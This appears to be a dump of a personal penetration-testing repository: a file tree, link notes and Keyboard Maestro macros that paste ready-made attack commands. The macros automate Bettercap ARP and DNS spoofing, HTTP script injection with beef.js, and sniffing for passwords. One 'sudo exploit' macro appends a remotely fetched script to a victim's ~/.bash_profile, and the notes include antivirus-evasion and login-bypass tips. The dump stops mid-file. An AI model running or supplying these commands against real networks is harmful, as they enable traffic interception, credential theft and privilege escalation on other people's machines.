├── README.md
├── ressources
│   ├── attacks.md
│   ├── hardware.md
│   └── macros
│       ├── Bettercap Macros.kmmacros
│       ├── Computer Macros.kmmacros
│       ├── Exploitation Macros.kmmacros
│       ├── Information gathering Macros.kmmacros
│       ├── Metasploit Macros.kmmacros
│       ├── Post exploitation Macros.kmmacros
│       ├── README.md
│       └── Remote terminal Macros.kmmacros
├── system
│   └── exploitation
│       ├── backdoor.sh
│       ├── host_DNS_enum.sh
│       ├── payloads
│       │   ├── bash.md
│       │   ├── python.md
│       │   ├── ruby.md
│       │   └── tclsh.md
│       ├── reverse_shells.md
│       ├── reverse_tcp.py
│       └── sudo.sh
├── tools
│   ├── brute_force
│   │   └── wpscan.md
│   ├── john.md
│   ├── metasploit.md
│   ├── mitm
│   │   ├── ARP Spoofing & Bettercap.md
│   │   ├── ARP Spoofing & MITM Proxy.md
│   │   ├── ARP Spoofing & MITM.md
│   │   └── DNS Spoofing & MITM.md
│   ├── msfvenom.md
│   ├── network_scan
│   │   ├── netdiscover.md
│   │   └── openvas.md
│   ├── python.md
│   ├── tcpdump.md
│   ├── web
│   │   └── web_vulnerabilities.md
│   ├── wireshark.md
│   └── wordlists
│       ├── cewl.md
│       ├── cupp.md
│       └── wordlists.md
└── wifi
    ├── crack.md
    ├── fake_ap.md
    ├── frameworks.md
    ├── phishing.md
    └── sniffing.md
/ressources/attacks.md:
--------------------------------------------------------------------------------
1 | Capture Wi-Fi in Wireshark:
2 | https://miloserdov.org/?p=2525
3 |
4 | https://www.kalitut.com/2019/04/decrypt-wi-fi-traffic-wireshark.html
5 |
6 | Bettercap http alone:
7 | https://www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets
8 |
9 | https://net-security.fr/security/prise-en-main-de-bettercap-sur-kali-linux/
10 |
11 | Check !!! USB-Rubber-Ducky
12 | https://github.com/hak5darren/USB-Rubber-Ducky
13 |
14 | Virus total:
15 |
16 | Test a virus to find out which antivirus engines detect it. (Don't upload a custom virus to VirusTotal: its database is used to add new viruses to antivirus databases.)
17 | https://www.virustotal.com/gui/
18 |
19 |
--------------------------------------------------------------------------------
/ressources/hardware.md:
--------------------------------------------------------------------------------
1 | USB:
2 | https://shop.hak5.org/
3 |
4 | Authentication evasion:
5 | Boot from USB and the system no longer needs credentials to log in, on Windows and macOS.
6 |
7 | https://www.piotrbania.com/all/kon-boot/fr
--------------------------------------------------------------------------------
/ressources/macros/Bettercap Macros.kmmacros:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Activate
7 | Normal
8 | CreationDate
9 | 604439241.08792102
10 | CustomIconData
11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
12 | Macros
13 |
14 |
15 | Actions
16 |
17 |
18 | Buttons
19 |
20 |
21 | Button
22 | OK
23 |
24 |
25 | Button
26 | Cancel
27 | Cancel
28 |
29 |
30 |
31 | MacroActionType
32 | PromptForUserInput
33 | Prompt
34 | Please enter the information needed (domain and rhost are optional):
35 | TimeOutAbortsMacro
36 |
37 | Title
38 | Scan network
39 | Variables
40 |
41 |
42 | Default
43 | %Variable%Gateway%
44 | Variable
45 | Gateway
46 |
47 |
48 | Default
49 | %Variable%Interface%
50 | Variable
51 | interface
52 |
53 |
54 |
55 |
56 | Action
57 | ByPasting
58 | MacroActionType
59 | InsertText
60 | Text
61 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'net.recon on;net.probe on;clear;ticker on;'
62 |
63 |
64 | IsDisclosed
65 |
66 | KeyCode
67 | 36
68 | MacroActionType
69 | SimulateKeystroke
70 | Modifiers
71 | 0
72 | ReleaseAll
73 |
74 | TargetApplication
75 |
76 | TargetingType
77 | Front
78 |
79 |
80 | CreationDate
81 | 604447378.603374
82 | CustomIconData
83 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
84 | ModificationDate
85 | 610919145.01962996
86 | Name
87 | Scan network (bettercap)
88 | Triggers
89 |
90 |
91 | MacroTriggerType
92 | StatusMenu
93 |
94 |
95 | UID
96 | C7A8BAFF-E384-45F6-AFC7-EE8E991C840F
97 |
98 |
99 | Name
100 | Bettercap
101 | Targeting
102 |
103 | Targeting
104 | Included
105 | TargetingApps
106 |
107 |
108 | BundleIdentifier
109 | com.apple.Terminal
110 | Name
111 | Terminal
112 | NewFile
113 | /System/Applications/Utilities/Terminal.app
114 |
115 |
116 | BundleIdentifier
117 | com.googlecode.iterm2
118 | Name
119 | iTerm
120 | NewFile
121 | /Applications/iTerm.app
122 |
123 |
124 |
125 | ToggleMacroUID
126 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505
127 | UID
128 | 8849B08E-11E5-4AF9-BBF0-327D0490E714
129 |
130 |
131 | Activate
132 | Normal
133 | CreationDate
134 | 604439241.08792102
135 | CustomIconData
136 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
137 | Macros
138 |
139 |
140 | Actions
141 |
142 |
143 | Buttons
144 |
145 |
146 | Button
147 | OK
148 |
149 |
150 | Button
151 | Cancel
152 | Cancel
153 |
154 |
155 |
156 | MacroActionType
157 | PromptForUserInput
158 | Prompt
159 | Please enter the local gateway and interface:
160 | TimeOutAbortsMacro
161 |
162 | Title
163 | Open bettercap
164 | Variables
165 |
166 |
167 | Default
168 | %Variable%Gateway%
169 | Variable
170 | Gateway
171 |
172 |
173 | Default
174 | %Variable%Interface%
175 | Variable
176 | Interface
177 |
178 |
179 |
180 |
181 | Action
182 | ByPasting
183 | MacroActionType
184 | InsertText
185 | Text
186 | sudo bettercap -caplet http-ui -gateway-override %Variable%Gateway% -iface %Variable%Interface%
187 |
188 |
189 | IsDisclosed
190 |
191 | KeyCode
192 | 36
193 | MacroActionType
194 | SimulateKeystroke
195 | Modifiers
196 | 0
197 | ReleaseAll
198 |
199 | TargetApplication
200 |
201 | TargetingType
202 | Front
203 |
204 |
205 | CreationDate
206 | 603158737.91990697
207 | CustomIconData
208 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
209 | ModificationDate
210 | 604465850.83681703
211 | Name
212 | Open bettercap (web view)
213 | Triggers
214 |
215 |
216 | MacroTriggerType
217 | StatusMenu
218 |
219 |
220 | UID
221 | B466BFAC-2F85-4ED7-BB1E-C14C1D73D1A4
222 |
223 |
224 | Name
225 | Bettercap
226 | Targeting
227 |
228 | Targeting
229 | Included
230 | TargetingApps
231 |
232 |
233 | BundleIdentifier
234 | com.apple.Terminal
235 | Name
236 | Terminal
237 | NewFile
238 | /System/Applications/Utilities/Terminal.app
239 |
240 |
241 | BundleIdentifier
242 | com.googlecode.iterm2
243 | Name
244 | iTerm
245 | NewFile
246 | /Applications/iTerm.app
247 |
248 |
249 |
250 | ToggleMacroUID
251 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505
252 | UID
253 | 8849B08E-11E5-4AF9-BBF0-327D0490E714
254 |
255 |
256 | Activate
257 | Normal
258 | CreationDate
259 | 604439241.08792102
260 | CustomIconData
261 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
262 | Macros
263 |
264 |
265 | Actions
266 |
267 |
268 | Buttons
269 |
270 |
271 | Button
272 | OK
273 |
274 |
275 | Button
276 | Cancel
277 | Cancel
278 |
279 |
280 |
281 | MacroActionType
282 | PromptForUserInput
283 | Prompt
284 | Please enter the local gateway and interface:
285 | TimeOutAbortsMacro
286 |
287 | Title
288 | Open bettercap
289 | Variables
290 |
291 |
292 | Default
293 | %Variable%Gateway%
294 | Variable
295 | Gateway
296 |
297 |
298 | Default
299 | %Variable%Interface%
300 | Variable
301 | Interface
302 |
303 |
304 |
305 |
306 | Action
307 | ByPasting
308 | MacroActionType
309 | InsertText
310 | Text
311 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface%
312 |
313 |
314 | IsDisclosed
315 |
316 | KeyCode
317 | 36
318 | MacroActionType
319 | SimulateKeystroke
320 | Modifiers
321 | 0
322 | ReleaseAll
323 |
324 | TargetApplication
325 |
326 | TargetingType
327 | Front
328 |
329 |
330 | CreationDate
331 | 603158737.91990697
332 | CustomIconData
333 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
334 | ModificationDate
335 | 604460217.17678595
336 | Name
337 | Open bettercap
338 | Triggers
339 |
340 |
341 | MacroTriggerType
342 | StatusMenu
343 |
344 |
345 | UID
346 | 0A677BCF-70A5-45EF-A5E9-FF26D38E3E22
347 |
348 |
349 | Name
350 | Bettercap
351 | Targeting
352 |
353 | Targeting
354 | Included
355 | TargetingApps
356 |
357 |
358 | BundleIdentifier
359 | com.apple.Terminal
360 | Name
361 | Terminal
362 | NewFile
363 | /System/Applications/Utilities/Terminal.app
364 |
365 |
366 | BundleIdentifier
367 | com.googlecode.iterm2
368 | Name
369 | iTerm
370 | NewFile
371 | /Applications/iTerm.app
372 |
373 |
374 |
375 | ToggleMacroUID
376 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505
377 | UID
378 | 8849B08E-11E5-4AF9-BBF0-327D0490E714
379 |
380 |
381 | Activate
382 | Normal
383 | CreationDate
384 | 604439241.08792102
385 | CustomIconData
386 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
387 | Macros
388 |
389 |
390 | Actions
391 |
392 |
393 | Buttons
394 |
395 |
396 | Button
397 | OK
398 |
399 |
400 | Button
401 | Cancel
402 | Cancel
403 |
404 |
405 |
406 | MacroActionType
407 | PromptForUserInput
408 | Prompt
409 | Please enter the information needed (domain and rhost are optional):
410 | TimeOutAbortsMacro
411 |
412 | Title
413 | HTTP Script injection
414 | Variables
415 |
416 |
417 | Default
418 | %Variable%Gateway%
419 | Variable
420 | Gateway
421 |
422 |
423 | Default
424 | %Variable%RHOST%
425 | Variable
426 | RHOST
427 |
428 |
429 | Default
430 | %Variable%Domain%
431 | Variable
432 | Domain
433 |
434 |
435 | Default
436 | beef.js|invert.js|redirect.js|replace.js|web-override.js
437 | Variable
438 | Script
439 |
440 |
441 | Default
442 | %Variable%Interface%
443 | Variable
444 | interface
445 |
446 |
447 |
448 |
449 | Conditions
450 |
451 | ConditionList
452 |
453 |
454 | ConditionType
455 | Variable
456 | Variable
457 | RHOST
458 | VariableConditionType
459 | IsEmpty
460 | VariableValue
461 | value
462 |
463 |
464 | ConditionListMatch
465 | All
466 |
467 | ElseActions
468 |
469 |
470 | Conditions
471 |
472 | ConditionList
473 |
474 |
475 | ConditionType
476 | Variable
477 | Variable
478 | Domain
479 | VariableConditionType
480 | IsEmpty
481 | VariableValue
482 | value
483 |
484 |
485 | ConditionListMatch
486 | All
487 |
488 | ElseActions
489 |
490 |
491 | Action
492 | ByPasting
493 | MacroActionType
494 | InsertText
495 | Text
496 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;set http.proxy.blacklist *;set http.proxy.whitelist %Variable%Domain%;http.proxy on'
497 |
498 |
499 | MacroActionType
500 | IfThenElse
501 | ThenActions
502 |
503 |
504 | Action
505 | ByPasting
506 | MacroActionType
507 | InsertText
508 | Text
509 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;http.proxy on'
510 |
511 |
512 | TimeOutAbortsMacro
513 |
514 |
515 |
516 | MacroActionType
517 | IfThenElse
518 | ThenActions
519 |
520 |
521 | Conditions
522 |
523 | ConditionList
524 |
525 |
526 | ConditionType
527 | Variable
528 | Variable
529 | Domain
530 | VariableConditionType
531 | IsEmpty
532 | VariableValue
533 | value
534 |
535 |
536 | ConditionListMatch
537 | All
538 |
539 | ElseActions
540 |
541 |
542 | Action
543 | ByPasting
544 | MacroActionType
545 | InsertText
546 | Text
547 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;set http.proxy.blacklist *;set http.proxy.whitelist %Variable%Domain%;http.proxy on'
548 |
549 |
550 | MacroActionType
551 | IfThenElse
552 | ThenActions
553 |
554 |
555 | Action
556 | ByPasting
557 | MacroActionType
558 | InsertText
559 | Text
560 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;http.proxy on'
561 |
562 |
563 | TimeOutAbortsMacro
564 |
565 |
566 |
567 | TimeOutAbortsMacro
568 |
569 |
570 |
571 | IsDisclosed
572 |
573 | KeyCode
574 | 36
575 | MacroActionType
576 | SimulateKeystroke
577 | Modifiers
578 | 0
579 | ReleaseAll
580 |
581 | TargetApplication
582 |
583 | TargetingType
584 | Front
585 |
586 |
587 | CreationDate
588 | 604447378.603374
589 | CustomIconData
590 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
591 | ModificationDate
592 | 604477603.24702001
593 | Name
594 | HTTP Script injection (bettercap)
595 | Triggers
596 |
597 |
598 | MacroTriggerType
599 | StatusMenu
600 |
601 |
602 | UID
603 | 4ECBA013-A056-4A24-9FA6-7AA3F8075DDD
604 |
605 |
606 | Name
607 | Bettercap
608 | Targeting
609 |
610 | Targeting
611 | Included
612 | TargetingApps
613 |
614 |
615 | BundleIdentifier
616 | com.apple.Terminal
617 | Name
618 | Terminal
619 | NewFile
620 | /System/Applications/Utilities/Terminal.app
621 |
622 |
623 | BundleIdentifier
624 | com.googlecode.iterm2
625 | Name
626 | iTerm
627 | NewFile
628 | /Applications/iTerm.app
629 |
630 |
631 |
632 | ToggleMacroUID
633 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505
634 | UID
635 | 8849B08E-11E5-4AF9-BBF0-327D0490E714
636 |
637 |
638 | Activate
639 | Normal
640 | CreationDate
641 | 604439241.08792102
642 | CustomIconData
643 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
644 | Macros
645 |
646 |
647 | Actions
648 |
649 |
650 | Buttons
651 |
652 |
653 | Button
654 | OK
655 |
656 |
657 | Button
658 | Cancel
659 | Cancel
660 |
661 |
662 |
663 | MacroActionType
664 | PromptForUserInput
665 | Prompt
666 | Please enter the information needed (rhost is optional):
667 | TimeOutAbortsMacro
668 |
669 | Title
670 | DNS spoofing
671 | Variables
672 |
673 |
674 | Default
675 | %Variable%Gateway%
676 | Variable
677 | Gateway
678 |
679 |
680 | Default
681 | %Variable%RHOST%
682 | Variable
683 | RHOST
684 |
685 |
686 | Default
687 | %Variable%LHOST%
688 | Variable
689 | LHOST
690 |
691 |
692 | Default
693 | %Variable%Interface%
694 | Variable
695 | interface
696 |
697 |
698 | Default
699 | %Variable%Domain%
700 | Variable
701 | Domain
702 |
703 |
704 |
705 |
706 | Conditions
707 |
708 | ConditionList
709 |
710 |
711 | ConditionType
712 | Variable
713 | Variable
714 | RHOST
715 | VariableConditionType
716 | IsEmpty
717 | VariableValue
718 | value
719 |
720 |
721 | ConditionListMatch
722 | All
723 |
724 | ElseActions
725 |
726 |
727 | Action
728 | ByPasting
729 | MacroActionType
730 | InsertText
731 | Text
732 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set dns.spoof.domains %Variable%Domain%;set dns.spoof.address %Variable%LHOST%;dns.spoof on;set http.server.path /Library/WebServer/Documents;http.server on'
733 |
734 |
735 | MacroActionType
736 | IfThenElse
737 | ThenActions
738 |
739 |
740 | Action
741 | ByPasting
742 | MacroActionType
743 | InsertText
744 | Text
745 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set dns.spoof.domains %Variable%Domain%;set dns.spoof.all true;dns.spoof on;set http.server.path /Library/WebServer/Documents;http.server on'
746 |
747 |
748 | TimeOutAbortsMacro
749 |
750 |
751 |
752 | IsDisclosed
753 |
754 | KeyCode
755 | 36
756 | MacroActionType
757 | SimulateKeystroke
758 | Modifiers
759 | 0
760 | ReleaseAll
761 |
762 | TargetApplication
763 |
764 | TargetingType
765 | Front
766 |
767 |
768 | CreationDate
769 | 604447378.603374
770 | CustomIconData
771 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
772 | ModificationDate
773 | 604471840.16793704
774 | Name
775 | DNS spoofing (bettercap)
776 | Triggers
777 |
778 |
779 | MacroTriggerType
780 | StatusMenu
781 |
782 |
783 | UID
784 | 201B3F76-A89D-44E9-B003-47798139B4F8
785 |
786 |
787 | Name
788 | Bettercap
789 | Targeting
790 |
791 | Targeting
792 | Included
793 | TargetingApps
794 |
795 |
796 | BundleIdentifier
797 | com.apple.Terminal
798 | Name
799 | Terminal
800 | NewFile
801 | /System/Applications/Utilities/Terminal.app
802 |
803 |
804 | BundleIdentifier
805 | com.googlecode.iterm2
806 | Name
807 | iTerm
808 | NewFile
809 | /Applications/iTerm.app
810 |
811 |
812 |
813 | ToggleMacroUID
814 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505
815 | UID
816 | 8849B08E-11E5-4AF9-BBF0-327D0490E714
817 |
818 |
819 | Activate
820 | Normal
821 | CreationDate
822 | 604439241.08792102
823 | CustomIconData
824 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
825 | Macros
826 |
827 |
828 | Actions
829 |
830 |
831 | Buttons
832 |
833 |
834 | Button
835 | OK
836 |
837 |
838 | Button
839 | Cancel
840 | Cancel
841 |
842 |
843 |
844 | MacroActionType
845 | PromptForUserInput
846 | Prompt
847 | Please enter the information needed (domain and rhost are optional):
848 | TimeOutAbortsMacro
849 |
850 | Title
851 | Script injection
852 | Variables
853 |
854 |
855 | Default
856 | %Variable%Gateway%
857 | Variable
858 | Gateway
859 |
860 |
861 | Default
862 | %Variable%RHOST%
863 | Variable
864 | RHOST
865 |
866 |
867 | Default
868 | %Variable%Interface%
869 | Variable
870 | interface
871 |
872 |
873 |
874 |
875 | Conditions
876 |
877 | ConditionList
878 |
879 |
880 | ConditionType
881 | Variable
882 | Variable
883 | RHOST
884 | VariableConditionType
885 | IsEmpty
886 | VariableValue
887 | value
888 |
889 |
890 | ConditionListMatch
891 | All
892 |
893 | ElseActions
894 |
895 |
896 | Action
897 | ByPasting
898 | MacroActionType
899 | InsertText
900 | Text
901 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;'
902 |
903 |
904 | MacroActionType
905 | IfThenElse
906 | ThenActions
907 |
908 |
909 | Action
910 | ByPasting
911 | MacroActionType
912 | InsertText
913 | Text
914 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;'
915 |
916 |
917 | TimeOutAbortsMacro
918 |
919 |
920 |
921 | IsDisclosed
922 |
923 | KeyCode
924 | 36
925 | MacroActionType
926 | SimulateKeystroke
927 | Modifiers
928 | 0
929 | ReleaseAll
930 |
931 | TargetApplication
932 |
933 | TargetingType
934 | Front
935 |
936 |
937 | CreationDate
938 | 604447378.603374
939 | CustomIconData
940 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
941 | ModificationDate
942 | 604463902.08318996
943 | Name
944 | ARP spoofing (bettercap)
945 | Triggers
946 |
947 |
948 | MacroTriggerType
949 | StatusMenu
950 |
951 |
952 | UID
953 | A3CB8955-8A79-4019-8F21-1CBCE987FD29
954 |
955 |
956 | Name
957 | Bettercap
958 | Targeting
959 |
960 | Targeting
961 | Included
962 | TargetingApps
963 |
964 |
965 | BundleIdentifier
966 | com.apple.Terminal
967 | Name
968 | Terminal
969 | NewFile
970 | /System/Applications/Utilities/Terminal.app
971 |
972 |
973 | BundleIdentifier
974 | com.googlecode.iterm2
975 | Name
976 | iTerm
977 | NewFile
978 | /Applications/iTerm.app
979 |
980 |
981 |
982 | ToggleMacroUID
983 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505
984 | UID
985 | 8849B08E-11E5-4AF9-BBF0-327D0490E714
986 |
987 |
988 | Activate
989 | Normal
990 | CreationDate
991 | 604439241.08792102
992 | CustomIconData
993 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
994 | Macros
995 |
996 |
997 | Actions
998 |
999 |
1000 | Buttons
1001 |
1002 |
1003 | Button
1004 | OK
1005 |
1006 |
1007 | Button
1008 | Cancel
1009 | Cancel
1010 |
1011 |
1012 |
1013 | MacroActionType
1014 | PromptForUserInput
1015 | Prompt
1016 | Please enter a regular expression:
1017 | TimeOutAbortsMacro
1018 |
1019 | Title
1020 | Active sniffing
1021 | Variables
1022 |
1023 |
1024 | Default
1025 | .*password=.+
1026 | Variable
1027 | RegEx
1028 |
1029 |
1030 |
1031 |
1032 | Action
1033 | ByPasting
1034 | MacroActionType
1035 | InsertText
1036 | Text
1037 | set net.sniff.regexp %Variable%RegEx%;
1038 | set net.sniff.output passwords.pcap;
1039 | net.sniff on;
1040 |
1041 |
1042 | IsDisclosed
1043 |
1044 | KeyCode
1045 | 36
1046 | MacroActionType
1047 | SimulateKeystroke
1048 | Modifiers
1049 | 0
1050 | ReleaseAll
1051 |
1052 | TargetApplication
1053 |
1054 | TargetingType
1055 | Front
1056 |
1057 |
1058 | CreationDate
1059 | 603158737.91990697
1060 | CustomIconData
1061 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
1062 | ModificationDate
1063 | 604515003.09291196
1064 | Name
1065 | Active sniffing (bettercap interactive)
1066 | Triggers
1067 |
1068 |
1069 | MacroTriggerType
1070 | StatusMenu
1071 |
1072 |
1073 | UID
1074 | 92C0BD54-A52C-4951-AD34-0D2921D30CDA
1075 |
1076 |
1077 | Name
1078 | Bettercap
1079 | Targeting
1080 |
1081 | Targeting
1082 | Included
1083 | TargetingApps
1084 |
1085 |
1086 | BundleIdentifier
1087 | com.apple.Terminal
1088 | Name
1089 | Terminal
1090 | NewFile
1091 | /System/Applications/Utilities/Terminal.app
1092 |
1093 |
1094 | BundleIdentifier
1095 | com.googlecode.iterm2
1096 | Name
1097 | iTerm
1098 | NewFile
1099 | /Applications/iTerm.app
1100 |
1101 |
1102 |
1103 | ToggleMacroUID
1104 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505
1105 | UID
1106 | 8849B08E-11E5-4AF9-BBF0-327D0490E714
1107 |
1108 |
1109 |
1110 |
--------------------------------------------------------------------------------
/ressources/macros/Computer Macros.kmmacros:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Activate
7 | Normal
8 | CreationDate
9 | 603124606.59798503
10 | CustomIconData
11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
12 | Macros
13 |
14 |
15 | Actions
16 |
17 |
18 | Buttons
19 |
20 |
21 | Button
22 | OK
23 |
24 |
25 | Button
26 | Cancel
27 | Cancel
28 |
29 |
30 |
31 | MacroActionType
32 | PromptForUserInput
33 | Prompt
34 | Please enter your root password:
35 | TimeOutAbortsMacro
36 |
37 | Title
38 | Password
39 | Variables
40 |
41 |
42 | Default
43 |
44 | Variable
45 | password
46 |
47 |
48 |
49 |
50 | DisplayKind
51 | Briefly
52 | HonourFailureSettings
53 |
54 | IncludeStdErr
55 |
56 | MacroActionType
57 | ExecuteShellScript
58 | Path
59 |
60 | Source
61 | Variable
62 | SourceVariable
63 | password
64 | Text
65 | sudo -S $KMVAR_password apachectl stop
66 | TimeOutAbortsMacro
67 |
68 | TrimResults
69 |
70 | TrimResultsNew
71 |
72 | UseText
73 |
74 |
75 |
76 | CreationDate
77 | 603131715.94899499
78 | CustomIconData
79 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
80 | ModificationDate
81 | 603138475.32250798
82 | Name
83 | Stop apache
84 | Triggers
85 |
86 |
87 | MacroTriggerType
88 | StatusMenu
89 |
90 |
91 | UID
92 | E0136610-DB66-479F-B741-0E6C0D5E85A1
93 |
94 |
95 | Name
96 | Computer
97 | ToggleMacroUID
98 | 8C88CB68-EC28-4087-B557-8E43F803DB08
99 | UID
100 | 9E7318FE-5CDD-4F52-894A-D6CC604A18D4
101 |
102 |
103 | Activate
104 | Normal
105 | CreationDate
106 | 603124606.59798503
107 | CustomIconData
108 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
109 | Macros
110 |
111 |
112 | Actions
113 |
114 |
115 | Buttons
116 |
117 |
118 | Button
119 | OK
120 |
121 |
122 | Button
123 | Cancel
124 | Cancel
125 |
126 |
127 |
128 | IsDisclosed
129 |
130 | MacroActionType
131 | PromptForUserInput
132 | Prompt
133 | Please enter your root password:
134 | TimeOutAbortsMacro
135 |
136 | Title
137 | Password
138 | Variables
139 |
140 |
141 | Default
142 |
143 | Variable
144 | password
145 |
146 |
147 |
148 |
149 | DisplayKind
150 | Briefly
151 | HonourFailureSettings
152 |
153 | IncludeStdErr
154 |
155 | MacroActionType
156 | ExecuteShellScript
157 | Path
158 |
159 | Source
160 | Variable
161 | SourceVariable
162 | password
163 | Text
164 | sudo -S $KMVAR_password apachectl start
165 | TimeOutAbortsMacro
166 |
167 | TrimResults
168 |
169 | TrimResultsNew
170 |
171 | UseText
172 |
173 |
174 |
175 | CreationDate
176 | 603129950.14537895
177 | CustomIconData
178 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
179 | ModificationDate
180 | 603138466.58408499
181 | Name
182 | Start apache
183 | Triggers
184 |
185 |
186 | MacroTriggerType
187 | StatusMenu
188 |
189 |
190 | UID
191 | 2335E582-B066-44BC-996C-C1DB12B01839
192 |
193 |
194 | Name
195 | Computer
196 | ToggleMacroUID
197 | 8C88CB68-EC28-4087-B557-8E43F803DB08
198 | UID
199 | 9E7318FE-5CDD-4F52-894A-D6CC604A18D4
200 |
201 |
202 | Activate
203 | Normal
204 | CreationDate
205 | 603124606.59798503
206 | CustomIconData
207 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
208 | Macros
209 |
210 |
211 | Actions
212 |
213 |
214 | Buttons
215 |
216 |
217 | Button
218 | OK
219 |
220 |
221 | Button
222 | Cancel
223 | Cancel
224 |
225 |
226 |
227 | MacroActionType
228 | PromptForUserInput
229 | Prompt
230 | Please enter your local IP and victim password
231 | TimeOutAbortsMacro
232 |
233 | Title
234 | Information
235 | Variables
236 |
237 |
238 | Default
239 | %Variable%RHOST%
240 | Variable
241 | RHOST
242 |
243 |
244 | Default
245 | %Variable%USER%
246 | Variable
247 | USER
248 |
249 |
250 |
251 |
252 | Action
253 | ByPasting
254 | MacroActionType
255 | InsertText
256 | Text
257 | ssh %Variable%USER%@%Variable%RHOST%
258 |
259 |
260 | IsDisclosed
261 |
262 | KeyCode
263 | 36
264 | MacroActionType
265 | SimulateKeystroke
266 | Modifiers
267 | 0
268 | ReleaseAll
269 |
270 | TargetApplication
271 |
272 | TargetingType
273 | Front
274 |
275 |
276 | CreationDate
277 | 603162843.93542898
278 | CustomIconData
279 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
280 | ModificationDate
281 | 603480157.49153996
282 | Name
283 | SSH Connection
284 | Triggers
285 |
286 |
287 | MacroTriggerType
288 | StatusMenu
289 |
290 |
291 | UID
292 | DEEF106B-13B2-4F15-A7F3-81609ED48510
293 |
294 |
295 | Name
296 | Computer
297 | ToggleMacroUID
298 | 8C88CB68-EC28-4087-B557-8E43F803DB08
299 | UID
300 | 9E7318FE-5CDD-4F52-894A-D6CC604A18D4
301 |
302 |
303 | Activate
304 | Normal
305 | CreationDate
306 | 603124606.59798503
307 | CustomIconData
308 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
309 | Macros
310 |
311 |
312 | Actions
313 |
314 |
315 | IsDefaultApplication
316 |
317 | MacroActionType
318 | Open1File
319 | Path
320 | /Library/WebServer/Documents
321 |
322 |
323 | CreationDate
324 | 603138237.25083697
325 | CustomIconData
326 | KMEP-GenericFolder
327 | ModificationDate
328 | 604438326.31045103
329 | Name
330 | Open apache folder
331 | Triggers
332 |
333 |
334 | MacroTriggerType
335 | StatusMenu
336 |
337 |
338 | UID
339 | D6CCC2F6-62F9-4A9C-8DB9-FBE734C0EE90
340 |
341 |
342 | Name
343 | Computer
344 | ToggleMacroUID
345 | 8C88CB68-EC28-4087-B557-8E43F803DB08
346 | UID
347 | 9E7318FE-5CDD-4F52-894A-D6CC604A18D4
348 |
349 |
350 |
351 |
--------------------------------------------------------------------------------
/ressources/macros/Exploitation Macros.kmmacros:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Activate
7 | Normal
8 | CreationDate
9 | 603140665.49842894
10 | CustomIconData
11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
12 | Macros
13 |
14 |
15 | Actions
16 |
17 |
18 | Buttons
19 |
20 |
21 | Button
22 | OK
23 |
24 |
25 | Button
26 | Cancel
27 | Cancel
28 |
29 |
30 |
31 | MacroActionType
32 | PromptForUserInput
33 | Prompt
34 | Please enter your local IP
35 | TimeOutAbortsMacro
36 |
37 | Title
38 | Root escalation sudo exploit
39 | Variables
40 |
41 |
42 | Default
43 | %Variable%LHOST%
44 | Variable
45 | LHOST
46 |
47 |
48 |
49 |
50 | Action
51 | ByPasting
52 | MacroActionType
53 | InsertText
54 | Text
55 | cp ~/.bash_profile ~/.bash_profile.old && curl 'http://%Variable%LHOST%/sudo' >> ~/.bash_profile
56 |
57 |
58 | IsDisclosed
59 |
60 | KeyCode
61 | 36
62 | MacroActionType
